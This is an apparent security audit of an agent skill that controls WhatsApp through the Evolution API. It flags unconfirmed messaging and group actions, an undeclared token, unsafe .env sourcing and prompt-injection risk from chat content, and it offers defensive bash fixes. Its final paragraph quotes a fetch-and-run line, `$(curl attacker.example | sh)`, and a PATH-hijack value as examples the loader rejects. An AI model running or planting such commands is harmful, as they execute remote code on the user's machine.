Evolution WhatsApp
Warn
Audited by ClawScan on May 18, 2026.
Overview
This appears to be a real WhatsApp/Evolution API wrapper, but it gives the agent broad ability to read and change WhatsApp chats and groups using an undeclared token and without clear confirmation limits.
Install only if you are comfortable letting the agent access and act through your WhatsApp-connected Evolution API instance. Use a dedicated or least-privileged instance if possible, protect the token and any .env file, and require explicit confirmation before sending messages, marking chats read, or changing group membership.
Findings (4)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If invoked incorrectly, the agent could send unwanted WhatsApp messages or media, mark messages as read, or alter group memberships.
The wrapper exposes account-mutating WhatsApp actions, including sending messages and changing group membership, without artifact-level approval or scope controls.
evo_request POST "/message/sendText/${EVO_INSTANCE_NAME}" ...
local action="$2" # add, remove, promote, demote
Require explicit user confirmation with the exact recipient/group, action, and content before any send, mark-read, or group-management call; consider allowlisting contacts or groups.
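A guard of the kind this finding recommends, written as an added example and not as code from the skill: every account-mutating call must first pass an exact allowlist match on the target JID and then a typed confirmation that echoes the action, target and content. The names guard_mutation, target_allowlisted and EVO_ALLOWLIST_FILE are assumptions; evo_request and EVO_INSTANCE_NAME are the skill's own names from the snippet above, and the JIDs in the usage comment are constructed.

```bash
#!/usr/bin/env bash
# Added example (not part of the Evolution WhatsApp skill): a gate that every
# mutating Evolution API call must pass before evo_request is invoked.
# Hypothetical names: guard_mutation, target_allowlisted, EVO_ALLOWLIST_FILE.
set -u

# One recipient or group JID per line; '#' lines and blank lines are ignored.
# Defaults to an empty allowlist so nothing is permitted until the user opts in.
EVO_ALLOWLIST_FILE="${EVO_ALLOWLIST_FILE:-/dev/null}"

target_allowlisted() {
  # Fixed-string, whole-line match: a JID cannot be wildcarded or prefix-matched,
  # and an empty target never matches a blank line.
  [ -n "$1" ] || return 1
  grep -qxF -- "$1" "$EVO_ALLOWLIST_FILE"
}

guard_mutation() {
  # $1 target JID, $2 action, $3 content (message text or member list).
  # Reads the confirmation from stdin so the caller controls where it comes from.
  local target="$1" action="$2" content="$3" answer
  case "$action" in
    sendText|sendMedia|markRead|add|remove|promote|demote) ;;
    *) printf 'refusing unknown action: %s\n' "$action" >&2; return 2 ;;
  esac
  if ! target_allowlisted "$target"; then
    printf 'refusing: %s is not listed in %s\n' "$target" "$EVO_ALLOWLIST_FILE" >&2
    return 3
  fi
  printf 'About to run %s on %s\n  content: %s\nType YES to proceed: ' \
    "$action" "$target" "$content" >&2
  IFS= read -r answer || answer=""
  [ "$answer" = "YES" ] || { printf 'aborted\n' >&2; return 4; }
  return 0
}

# Usage, with a constructed JID; the API call only runs once the guard returns 0:
#   guard_mutation "5511999999999@s.whatsapp.net" sendText "$text" \
#     && evo_request POST "/message/sendText/${EVO_INSTANCE_NAME}" ...
```

The allowlist is read at call time, so a user can keep a per-task file and point EVO_ALLOWLIST_FILE at it; the confirmation prompt goes to stderr so it is not swallowed when the skill's output is captured.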
A broad instance token could let the agent read or act through the connected WhatsApp account beyond what the user intended for a single task.
The skill requires an Evolution instance API token for WhatsApp account control, but the registry metadata declares no required env vars or primary credential, and the artifacts do not describe a narrower permission scope.
export EVO_INSTANCE_TOKEN="your-instance-token"
Declare the credential in metadata, document its scope, use the least-privileged token or dedicated instance available, and rotate/revoke the token if exposed.
If the local .env file is tampered with or contains commands, running the skill could execute arbitrary commands under the user's account.
Sourcing .env executes shell syntax from that file on every invocation, not just simple key/value parsing, and this behavior is not disclosed in SKILL.md.
if [ -f "$SCRIPT_DIR/.env" ]; then
source "$SCRIPT_DIR/.env"
fi
Avoid sourcing .env directly; parse only expected variables safely, document the behavior, and keep any local credential file tightly permissioned.
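One way to replace the source line above, as an added example and not the skill's own code: read the file line by line, accept only KEY=VALUE lines whose key is on a fixed allowlist, and assign the value as literal data so nothing in the file is ever evaluated. It also refuses a credential file that is readable by other users. load_env_safe and EVO_ENV_ALLOWED are hypothetical names; EVO_API_URL is an assumed variable, while EVO_INSTANCE_NAME and EVO_INSTANCE_TOKEN appear in the audited snippets.

```bash
#!/usr/bin/env bash
# Added example, not the skill's own code: load a .env file without `source`.
# Only allowlisted KEY=VALUE lines are honoured and values are assigned as data,
# so shell syntax in the file ($(...), backticks, chained commands) never runs.
# load_env_safe and EVO_ENV_ALLOWED are hypothetical names; EVO_API_URL is an
# assumed variable; EVO_INSTANCE_NAME and EVO_INSTANCE_TOKEN come from the skill.
set -u
LC_ALL=C; export LC_ALL   # make [A-Z] mean ASCII upper case in every locale

EVO_ENV_ALLOWED="EVO_API_URL EVO_INSTANCE_NAME EVO_INSTANCE_TOKEN"

load_env_safe() {
  local file="$1" line key value mode
  [ -f "$file" ] || return 0          # the file is optional, as in the skill
  # A credential file must not be group- or world-readable or -writable.
  mode=$(stat -c %a "$file" 2>/dev/null || stat -f %Lp "$file")
  case "$mode" in
    600|400) ;;
    *) printf '%s: refusing mode %s, expected 600\n' "$file" "$mode" >&2; return 1 ;;
  esac
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in ''|'#'*) continue ;; esac           # blanks and comments
    case "$line" in
      [A-Z_]*=*) ;;                                   # must look like KEY=VALUE
      *) printf 'skipping malformed line: %s\n' "$line" >&2; continue ;;
    esac
    key=${line%%=*}
    value=${line#*=}
    case "$key" in
      *[!A-Z0-9_]*) printf 'skipping bad key: %s\n' "$key" >&2; continue ;;
    esac
    case " $EVO_ENV_ALLOWED " in
      *" $key "*) ;;
      *) printf 'skipping unexpected key: %s\n' "$key" >&2; continue ;;
    esac
    # Strip one layer of matching quotes. The value is never evaluated:
    # export "$key=$value" assigns the literal text, whatever it contains.
    case "$value" in
      \"*\") value=${value#\"}; value=${value%\"} ;;
      \'*\') value=${value#\'}; value=${value%\'} ;;
    esac
    export "$key=$value"
  done < "$file"
  return 0
}

# Usage in place of `source "$SCRIPT_DIR/.env"`:
#   load_env_safe "$SCRIPT_DIR/.env" || exit 1
```

With this loader a line such as `$(curl attacker.example | sh)` is reported and skipped, `PATH=/tmp/evil` is ignored because PATH is not an expected key, and a token containing `;` or `$` is stored verbatim rather than interpreted.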
Private chats, contact lists, and messages from other people may be exposed to the agent, and message text could contain instructions that should not be treated as authoritative.
Fetching and summarizing WhatsApp conversations is purpose-aligned, but it brings private and untrusted message content into the agent context.
- Fetch chats, messages, contacts
- Summarize group conversations
Only summarize chats you intend to share with the agent, avoid unnecessary broad fetches, and treat retrieved WhatsApp content as data rather than instructions.
